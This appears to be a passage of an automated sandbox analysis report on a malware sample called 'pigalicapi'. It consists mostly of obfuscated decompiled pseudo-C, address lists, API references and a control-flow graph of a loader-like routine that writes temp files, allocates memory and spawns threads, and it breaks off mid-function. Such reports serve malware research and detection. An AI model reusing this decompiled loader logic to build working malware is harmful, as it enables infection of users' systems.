                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t402[0x1f] + 0x6c)) =  *((intOrPtr*)(_t402[0x1f] + 0x6c)) -  *((intOrPtr*)(_t402[0x1f] + 0xe4)) - 0x62;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t402[0x1f] + 0xdc)) = _t402[0x12] * _t402[0x12] +  *((intOrPtr*)(_t402[0x1f] + 0xdc));
                                                                                                                                                                                                                                                                            							 *(_t402[0x1f] + 0x10c) =  *((intOrPtr*)(_t402[0x1f] + 0x8c)) -  *((intOrPtr*)(_t402[0x1f] + 0xd0)) + 0x00033baa ^  *(_t402[0x1f] + 0x10c);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t402[0x1f] + 0xac)) =  *((intOrPtr*)(_t402[0x1f] + 0xb4)) -  *0x00D0D3BC +  *((intOrPtr*)(_t402[0x1f] + 0xac)) - 0x367796e1;
                                                                                                                                                                                                                                                                            							_t402[0x12] = _t402[0x12] + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t402[7] = _t402[0x17] + 0x2598;
                                                                                                                                                                                                                                                                            						_t402[8] = _t402[0x14] ^ 0x000002ef;
                                                                                                                                                                                                                                                                            						_t402[9] = _t402[0x17] ^ 0x000025a0;
                                                                                                                                                                                                                                                                            						_t402[0xa] = _t402[0x16] ^ 0x00002801;
                                                                                                                                                                                                                                                                            						_t402[0xb] = _t402[0x17] + 0x2565;
                                                                                                                                                                                                                                                                            						_t402[0xc] = _t402[0x15] + 0x2622;
                                                                                                                                                                                                                                                                            						_t227 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						_t402[0xd] = _t227;
                                                                                                                                                                                                                                                                            						_t402[0x17] = E00C73660(_t402[7], _t402[8], _t402[9], _t402[0xa], _t402[0xb], _t402[0xc], _t402[0xd]);
                                                                                                                                                                                                                                                                            						 *0xd0d448 =  *((intOrPtr*)(_t402[0x1f] + 0xdc));
                                                                                                                                                                                                                                                                            						_t402[2] = _t402[0x13] + 0x17a;
                                                                                                                                                                                                                                                                            						_t402[3] = _t402[0x15] + 0x2622;
                                                                                                                                                                                                                                                                            						_t402[4] = _t402[0xf] + 0x17a;
                                                                                                                                                                                                                                                                            						_t402[5] = _t402[0x1f];
                                                                                                                                                                                                                                                                            						_t402[6] = _t402[0x17] ^ 0x000000fc;
                                                                                                                                                                                                                                                                            						_t402[0x14] = E00C885E0(_t402[2], _t402[3], _t402[4], _t402[5], _t402[6]);
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x10) = _t402[0x13] ^ 0x00000111;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0xc) = _t402[0x1f];
                                                                                                                                                                                                                                                                            						 *(_t402 - 8) = _t402[0x10] ^ 0x000003bc;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 4)) = _t402[0x14] + 0x6b;
                                                                                                                                                                                                                                                                            						 *_t402 = _t402[0x15] ^ 0x00002565;
                                                                                                                                                                                                                                                                            						_t402[1] = _t402[0x16] ^ 0x00002506;
                                                                                                                                                                                                                                                                            						_push(_t402[1]);
                                                                                                                                                                                                                                                                            						_t402[0x16] = E00C74A40( *(_t402 - 0x10),  *(_t402 - 0xc),  *(_t402 - 8),  *((intOrPtr*)(_t402 - 4)),  *_t402);
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x2c)) = _t402[0x14] + 0xa4;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x28) = _t402[0x16] ^ 0x00000308;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x24)) = _t402[0x14] - 0x25b;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x20)) = _t402[0x17] - 0x134;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x1c) = _t402[0x10] ^ 0x000000a5;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x18) = _t402[0x15] ^ 0x000025a0;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x14)) = 0xd0d3a8;
                                                                                                                                                                                                                                                                            						_t249 = E00C71280( *((intOrPtr*)(_t402 - 0x2c)),  *(_t402 - 0x28),  *((intOrPtr*)(_t402 - 0x24)),  *((intOrPtr*)(_t402 - 0x20)),  *(_t402 - 0x1c),  *(_t402 - 0x18),  *((intOrPtr*)(_t402 - 0x14))); // executed
                                                                                                                                                                                                                                                                            						_t402[0x16] = _t249;
                                                                                                                                                                                                                                                                            						_t402[0x13] = _t402[0x13] ^ 0x00000062;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t402[0xf] - 0x1c0;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x00c74041
                                                                                                                                                                                                                                                                            0x00c74054
                                                                                                                                                                                                                                                                            0x00c74060
                                                                                                                                                                                                                                                                            0x00c7406c
                                                                                                                                                                                                                                                                            0x00c74075
                                                                                                                                                                                                                                                                            0x00c74081
                                                                                                                                                                                                                                                                            0x00c7408a
                                                                                                                                                                                                                                                                            0x00c74095
                                                                                                                                                                                                                                                                            0x00c740a1
                                                                                                                                                                                                                                                                            0x00c740b0
                                                                                                                                                                                                                                                                            0x00c7440e
                                                                                                                                                                                                                                                                            0x00c7441d
                                                                                                                                                                                                                                                                            0x00c74435
                                                                                                                                                                                                                                                                            0x00c7443b
                                                                                                                                                                                                                                                                            0x00c7443e
                                                                                                                                                                                                                                                                            0x00c74447
                                                                                                                                                                                                                                                                            0x00c74456
                                                                                                                                                                                                                                                                            0x00c74468
                                                                                                                                                                                                                                                                            0x00c7447e
                                                                                                                                                                                                                                                                            0x00c74499
                                                                                                                                                                                                                                                                            0x00c74499
                                                                                                                                                                                                                                                                            0x00c740b6
                                                                                                                                                                                                                                                                            0x00c740c1
                                                                                                                                                                                                                                                                            0x00c74389
                                                                                                                                                                                                                                                                            0x00c743a2
                                                                                                                                                                                                                                                                            0x00c743a4
                                                                                                                                                                                                                                                                            0x00c743aa
                                                                                                                                                                                                                                                                            0x00c743b0
                                                                                                                                                                                                                                                                            0x00c743be
                                                                                                                                                                                                                                                                            0x00c743e1
                                                                                                                                                                                                                                                                            0x00c743bb
                                                                                                                                                                                                                                                                            0x00c743bb
                                                                                                                                                                                                                                                                            0x00c743be
                                                                                                                                                                                                                                                                            0x00c740c7
                                                                                                                                                                                                                                                                            0x00c740cd
                                                                                                                                                                                                                                                                            0x00c740db
                                                                                                                                                                                                                                                                            0x00c7411b
                                                                                                                                                                                                                                                                            0x00c74132
                                                                                                                                                                                                                                                                            0x00c74175
                                                                                                                                                                                                                                                                            0x00c741b7
                                                                                                                                                                                                                                                                            0x00c740d8
                                                                                                                                                                                                                                                                            0x00c740d8
                                                                                                                                                                                                                                                                            0x00c741cb
                                                                                                                                                                                                                                                                            0x00c741d7
                                                                                                                                                                                                                                                                            0x00c741e3
                                                                                                                                                                                                                                                                            0x00c741ee
                                                                                                                                                                                                                                                                            0x00c741fa
                                                                                                                                                                                                                                                                            0x00c74206
                                                                                                                                                                                                                                                                            0x00c74209
                                                                                                                                                                                                                                                                            0x00c7420e
                                                                                                                                                                                                                                                                            0x00c74235
                                                                                                                                                                                                                                                                            0x00c74241
                                                                                                                                                                                                                                                                            0x00c7424f
                                                                                                                                                                                                                                                                            0x00c7425b
                                                                                                                                                                                                                                                                            0x00c74266
                                                                                                                                                                                                                                                                            0x00c7426c
                                                                                                                                                                                                                                                                            0x00c74278
                                                                                                                                                                                                                                                                            0x00c74297
                                                                                                                                                                                                                                                                            0x00c742a3
                                                                                                                                                                                                                                                                            0x00c742a9
                                                                                                                                                                                                                                                                            0x00c742b5
                                                                                                                                                                                                                                                                            0x00c742be
                                                                                                                                                                                                                                                                            0x00c742c9
                                                                                                                                                                                                                                                                            0x00c742d5
                                                                                                                                                                                                                                                                            0x00c742db
                                                                                                                                                                                                                                                                            0x00c742f8
                                                                                                                                                                                                                                                                            0x00c74304
                                                                                                                                                                                                                                                                            0x00c7430f
                                                                                                                                                                                                                                                                            0x00c7431b
                                                                                                                                                                                                                                                                            0x00c74327
                                                                                                                                                                                                                                                                            0x00c74332
                                                                                                                                                                                                                                                                            0x00c7433e
                                                                                                                                                                                                                                                                            0x00c74341
                                                                                                                                                                                                                                                                            0x00c74364
                                                                                                                                                                                                                                                                            0x00c7436c
                                                                                                                                                                                                                                                                            0x00c74375
                                                                                                                                                                                                                                                                            0x00c74375
                                                                                                                                                                                                                                                                            0x00c743e6
                                                                                                                                                                                                                                                                            0x00c744ae

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00C74499
                                                                                                                                                                                                                                                                              • Part of subcall function 00C71280: VirtualAlloc.KERNEL32(00000000,?,?,00000040), ref: 00C71352
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocCreateFileMappingVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 141659071-0
                                                                                                                                                                                                                                                                            • Opcode ID: f198be066850f3f375f0eea75b24cd8eac3abf5414f6d893743bfa9970df0cf3
                                                                                                                                                                                                                                                                            • Instruction ID: aa9fc26ad6dc8053c6a84e31ced09e11447751cee67e131eb66bf66be30882b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f198be066850f3f375f0eea75b24cd8eac3abf5414f6d893743bfa9970df0cf3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAE1D871600148DFDB18CF98C994A9EBBF6FF88304F54812AFA299B395D735E841CB94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                                                            			E01179F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				intOrPtr* _t59;
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 1;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                            					if(_a8 > 5) {
                                                                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                                                                            						_t59 = E011797A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                            						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                            						_v28 = _t59;
                                                                                                                                                                                                                                                                            						_v12 = _v28;
                                                                                                                                                                                                                                                                            						if(_v12 != 0) {
                                                                                                                                                                                                                                                                            							_v16 = _v12;
                                                                                                                                                                                                                                                                            							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                            							_push( &_v20);
                                                                                                                                                                                                                                                                            							_t64 = _v12;
                                                                                                                                                                                                                                                                            							_push(_t64); // executed
                                                                                                                                                                                                                                                                            							L0117B1DA(); // executed
                                                                                                                                                                                                                                                                            							if(_t64 == 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                            									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                            										E01177B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                            										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                            										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                            										_v12 =  *_v12;
                                                                                                                                                                                                                                                                            										_v8 = 1;
                                                                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *_a12 = _v24;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v32 = _v16;
                                                                                                                                                                                                                                                                            							E011797C0(_v32); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x01179f76
                                                                                                                                                                                                                                                                            0x01179f81
                                                                                                                                                                                                                                                                            0x01179f87
                                                                                                                                                                                                                                                                            0x01179f8b
                                                                                                                                                                                                                                                                            0x01179f94
                                                                                                                                                                                                                                                                            0x01179fad
                                                                                                                                                                                                                                                                            0x01179fb2
                                                                                                                                                                                                                                                                            0x01179fb5
                                                                                                                                                                                                                                                                            0x01179fbb
                                                                                                                                                                                                                                                                            0x01179fc2
                                                                                                                                                                                                                                                                            0x01179fcb
                                                                                                                                                                                                                                                                            0x01179fe0
                                                                                                                                                                                                                                                                            0x01179fe6
                                                                                                                                                                                                                                                                            0x01179fe7
                                                                                                                                                                                                                                                                            0x01179fea
                                                                                                                                                                                                                                                                            0x01179feb
                                                                                                                                                                                                                                                                            0x01179ff2
                                                                                                                                                                                                                                                                            0x01179ff4
                                                                                                                                                                                                                                                                            0x01179ffb
                                                                                                                                                                                                                                                                            0x0117a018
                                                                                                                                                                                                                                                                            0x0117a034
                                                                                                                                                                                                                                                                            0x0117a039
                                                                                                                                                                                                                                                                            0x0117a048
                                                                                                                                                                                                                                                                            0x0117a050
                                                                                                                                                                                                                                                                            0x0117a053
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a05e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a018
                                                                                                                                                                                                                                                                            0x0117a066
                                                                                                                                                                                                                                                                            0x0117a066
                                                                                                                                                                                                                                                                            0x0117a06b
                                                                                                                                                                                                                                                                            0x0117a072
                                                                                                                                                                                                                                                                            0x0117a077
                                                                                                                                                                                                                                                                            0x01179fc2
                                                                                                                                                                                                                                                                            0x01179f8b
                                                                                                                                                                                                                                                                            0x0117a080

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 011797A0: GetProcessHeap.KERNEL32(00000008,01179FB2,?,01179FB2,00000000,?,?,?,01179E2D), ref: 011797A9
                                                                                                                                                                                                                                                                              • Part of subcall function 011797A0: RtlAllocateHeap.NTDLL(00000000,?,01179FB2,00000000,?,?,?,01179E2D), ref: 011797B0
                                                                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,01179E2D), ref: 01179FEB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                            • Opcode ID: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                                            • Instruction ID: 0415ddb8fe75206982fa250e59bc2b005a93c02720291fc8f9d79831a4244c50
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36310A74E00209EFDF09CF98D494AEEBBB5EF48308F248569E909A7350D7359A45CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C7E101() {
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t1 = SetUnhandledExceptionFilter(E00C7E10D); // executed
                                                                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x00c7e106
                                                                                                                                                                                                                                                                            0x00c7e10c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000E10D,00C7DCBF), ref: 00C7E106
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8b62240d585629504ce3542e2dc86d599cfd4500a7c1725b06d0104d0f46d1a8
                                                                                                                                                                                                                                                                            • Instruction ID: b2e53e20650ecbf8693366fc1b91ddde05dc93bc793dade4fac77d5fd517ddce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b62240d585629504ce3542e2dc86d599cfd4500a7c1725b06d0104d0f46d1a8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 298 11762b0-11762c4 299 1176c4e 298->299 300 11762ca-11762ce 298->300 302 1176c51-1176c54 299->302 300->299 301 11762d4-11762e0 300->301 301->299 303 11762e6-11762ed 301->303 303->299 304 11762f3-1176314 303->304 306 117642e-1176453 304->306 307 117631a-117631e 304->307 313 1176c2f-1176c36 306->313 314 1176459-117645d 306->314 309 1176343-1176363 307->309 310 1176320-117633a 307->310 311 1176429 309->311 312 1176369-1176375 309->312 310->309 315 117633c-117633e 310->315 311->306 312->311 318 117637b-1176384 312->318 316 1176c44 313->316 317 1176c38-1176c42 313->317 319 1176482-11764a2 314->319 320 117645f-1176479 314->320 315->302 316->299 317->299 318->311 324 117638a-1176393 318->324 322 11765f3-11765fc 319->322 323 11764a8-11764b4 319->323 320->319 321 117647b-117647d 320->321 321->302 326 1176603-117660f 322->326 327 11765fe 322->327 323->322 325 11764ba-117654c GetEnvironmentVariableA call 1177d20 call 1179730 GetTickCount GetTempFileNameA CreateFileA 323->325 324->311 328 1176399-11763a2 324->328 325->322 356 1176552-1176586 WriteFile 325->356 330 1176615-1176621 326->330 331 1176bdd-1176be9 326->331 327->326 332 11763a4-11763ca VirtualAlloc 328->332 333 1176410-1176424 call 1171ee0 328->333 330->331 338 1176627-1176640 call 1177250 330->338 334 1176beb-1176bf7 331->334 335 1176c18-1176c24 331->335 339 117640e 332->339 340 11763cc-11763e4 call 1176260 332->340 345 1176427 333->345 334->335 341 1176bf9-1176c16 call 117a360 334->341 342 1176c26 335->342 343 1176c2a 335->343 357 1176647-117664e 338->357 358 1176642 338->358 339->345 353 11763e6-11763fa call 1171ee0 340->353 354 11763fd-1176408 VirtualFree 340->354 341->343 342->343 343->343 345->306 353->354 354->339 362 11765dd-11765e4 356->362 363 1176588-1176591 356->363 359 1176654-1176674 VirtualAlloc 357->359 360 1176752-117675b 357->360 358->357 359->360 364 117667a-1176747 call 1177b70 call 11797a0 CreateThread CloseHandle 359->364 367 1176761-1176788 360->367 368 11769ba-1176a49 GetEnvironmentVariableA call 1177d20 call 1179730 GetTickCount GetTempFileNameA CreateFileA 360->368 362->322 366 11765e6-11765ed CloseHandle 362->366 363->362 369 1176593-11765c7 CloseHandle call 1176c60 call 1171e60 363->369 364->360 366->322 372 117678e-11767c0 VirtualAlloc 367->372 373 1176858-1176864 call 1172070 367->373 393 1176bd6 368->393 394 1176a4f-1176a75 368->394 399 11765c9-11765d0 call 11774a0 ExitProcess 369->399 400 11765d8 call 1176cf0 369->400 378 1176856 372->378 379 11767c6-11767e7 call 1176260 372->379 383 117686a-1176871 373->383 378->383 397 1176842-1176850 VirtualFree 379->397 398 11767e9-1176807 call 1172070 379->398 389 1176877-117687e 383->389 390 11769b0 383->390 395 1176894-117689d 389->395 396 1176880-1176891 call 11773c0 389->396 390->368 393->331 403 1176b1e-1176b3c WriteFile 394->403 404 1176a7b-1176aad VirtualAlloc 394->404 406 11768a3-11768c8 call 11797a0 395->406 407 117698a-1176993 395->407 396->395 397->378 398->397 419 1176809-117683a VirtualAlloc call 1177b70 398->419 400->362 417 1176b42-1176b49 403->417 412 1176aaf-1176ad0 call 1176260 404->412 413 1176b1c 404->413 425 11768ca-11768e7 406->425 426 11768e9-117690d VirtualAlloc 406->426 414 1176995-11769a6 call 1172510 407->414 415 11769a9 407->415 434 1176ad2-1176b02 WriteFile 412->434 435 1176b08-1176b16 VirtualFree 412->435 413->417 414->415 415->390 422 1176b4b-1176b57 417->422 423 1176bc9-1176bd0 CloseHandle 417->423 432 117683f 419->432 422->423 424 1176b59-1176b82 CloseHandle call 1171e60 422->424 423->393 439 1176bc7 424->439 440 1176b84-1176b8b 424->440 431 1176934-117693d 425->431 426->431 433 117690f-1176931 call 1177b70 426->433 431->407 438 117693f-1176984 CreateThread CloseHandle 431->438 432->397 433->431 434->435 435->413 438->407 439->393 442 1176ba1-1176baa 440->442 443 1176b8d-1176b9e call 11773c0 440->443 445 1176bc0 442->445 446 1176bac-1176bbd call 1172510 442->446 443->442 445->439 446->445
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011762B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v13;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				void _v36;
                                                                                                                                                                                                                                                                            				void* _v40;
                                                                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                            				long _v56;
                                                                                                                                                                                                                                                                            				void _v60;
                                                                                                                                                                                                                                                                            				char _v324;
                                                                                                                                                                                                                                                                            				void* _v328;
                                                                                                                                                                                                                                                                            				char _v340;
                                                                                                                                                                                                                                                                            				char _v604;
                                                                                                                                                                                                                                                                            				int _v608;
                                                                                                                                                                                                                                                                            				long _v612;
                                                                                                                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                                                                                                                            				void* _v620;
                                                                                                                                                                                                                                                                            				void* _v624;
                                                                                                                                                                                                                                                                            				void* _v628;
                                                                                                                                                                                                                                                                            				int _v632;
                                                                                                                                                                                                                                                                            				signed int _v636;
                                                                                                                                                                                                                                                                            				long _v640;
                                                                                                                                                                                                                                                                            				void* _v644;
                                                                                                                                                                                                                                                                            				void* _v648;
                                                                                                                                                                                                                                                                            				void* _v652;
                                                                                                                                                                                                                                                                            				char _v916;
                                                                                                                                                                                                                                                                            				void* _v920;
                                                                                                                                                                                                                                                                            				char _v932;
                                                                                                                                                                                                                                                                            				char _v1196;
                                                                                                                                                                                                                                                                            				long _v1200;
                                                                                                                                                                                                                                                                            				int _v1204;
                                                                                                                                                                                                                                                                            				long _v1208;
                                                                                                                                                                                                                                                                            				void* _v1212;
                                                                                                                                                                                                                                                                            				long _v1216;
                                                                                                                                                                                                                                                                            				signed int _v1220;
                                                                                                                                                                                                                                                                            				void* _v1224;
                                                                                                                                                                                                                                                                            				void* _v1228;
                                                                                                                                                                                                                                                                            				intOrPtr _t317;
                                                                                                                                                                                                                                                                            				signed char _t321;
                                                                                                                                                                                                                                                                            				void* _t333;
                                                                                                                                                                                                                                                                            				signed int _t340;
                                                                                                                                                                                                                                                                            				void* _t349;
                                                                                                                                                                                                                                                                            				signed int _t355;
                                                                                                                                                                                                                                                                            				void* _t361;
                                                                                                                                                                                                                                                                            				void* _t368;
                                                                                                                                                                                                                                                                            				void* _t378;
                                                                                                                                                                                                                                                                            				void* _t381;
                                                                                                                                                                                                                                                                            				signed int _t383;
                                                                                                                                                                                                                                                                            				void* _t386;
                                                                                                                                                                                                                                                                            				void* _t393;
                                                                                                                                                                                                                                                                            				int _t415;
                                                                                                                                                                                                                                                                            				signed int _t421;
                                                                                                                                                                                                                                                                            				signed int _t428;
                                                                                                                                                                                                                                                                            				signed char _t433;
                                                                                                                                                                                                                                                                            				void* _t439;
                                                                                                                                                                                                                                                                            				signed char _t442;
                                                                                                                                                                                                                                                                            				void* _t448;
                                                                                                                                                                                                                                                                            				signed int _t452;
                                                                                                                                                                                                                                                                            				intOrPtr _t455;
                                                                                                                                                                                                                                                                            				void* _t465;
                                                                                                                                                                                                                                                                            				void* _t472;
                                                                                                                                                                                                                                                                            				void* _t473;
                                                                                                                                                                                                                                                                            				void* _t508;
                                                                                                                                                                                                                                                                            				void* _t509;
                                                                                                                                                                                                                                                                            				void* _t528;
                                                                                                                                                                                                                                                                            				void* _t529;
                                                                                                                                                                                                                                                                            				void* _t539;
                                                                                                                                                                                                                                                                            				void* _t549;
                                                                                                                                                                                                                                                                            				void* _t550;
                                                                                                                                                                                                                                                                            				void* _t551;
                                                                                                                                                                                                                                                                            				void* _t563;
                                                                                                                                                                                                                                                                            				void* _t598;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L99:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 =  *_a4;
                                                                                                                                                                                                                                                                            					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                            						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                            							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                                                            								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                            								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x117e270; // 0x1
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									L22:
                                                                                                                                                                                                                                                                            									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                            									__eflags = _t428;
                                                                                                                                                                                                                                                                            									_v24 = _t428;
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
